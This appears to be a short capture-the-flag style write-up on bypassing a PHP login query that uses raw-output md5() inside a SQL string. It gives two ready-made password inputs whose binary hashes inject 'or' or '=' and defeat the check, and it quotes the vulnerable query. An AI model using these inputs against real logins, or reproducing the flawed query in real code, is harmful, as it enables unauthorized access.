$row=@mysql_fetch_array(mysql_query("select * from admin_password where password='".md5($ps,true)."'"));OFCORSE WE DONT HAVE IDEA ABOUT PASSWORD , SO WE MUST FIND A WAY TO BYPASS THIS QUERY BY SQL INJECTION !
FIRST, TAKE A LOOK AT MD5() FUNCTION DEFINITION AND IT'S VULENERABILITY :
string md5 ( string $str , [ bool $raw_output = false ] )
THE STRING SUPPLIED AS THE FIRST ARGUMENT IS MD5 HASHED AND RETURNED OUTPUT 32 LENGTH OF HEX FORM . THE DEFAULT OF $raw_output IS FALSE, IF IT = TRUE , THE SUPPLIED STRING WILL BE RETURNED AS 16 BYTES OF BINARY VALUE .
NOW ,WE COME BACK TO THE SQL QUERY
(mysql_query("select * from admin_password where password='".md5($ps,true)."'");IF WE CAN 'FORCE' THE OUPUT MD5 PASSWORD CONTAINS : 'OR' or '=' , WE CAN BYPASS THIS QUERY BY SQL INJECTION . THIS QUERY WILL BECOME :
(mysql_query("select * from admin_password where password=''OR''");EXAMPLE 'DAD'OR'1=1' → FALSE OR TRUE → TRUE
THIS CASE: 129581926211651571912466741651878684928 IS THE PASSWORD SHOULD BE SENT TO MD5 FUNCTION
or
(mysql_query("select * from admin_password where password=''=''");'DAD'='SDSD' → FALSE = FALSE → TRUE
THIS CASE : 9235566 IS THE PASSWORD SHOULD BE SENT TO MD5 FUNCTION
SO , IN 2 CASES , THE PASSWORD OUTPUT WILL BE TRUE IN THE QUERY AND THE QUERY EXECUTED !
HAPPY HACKING!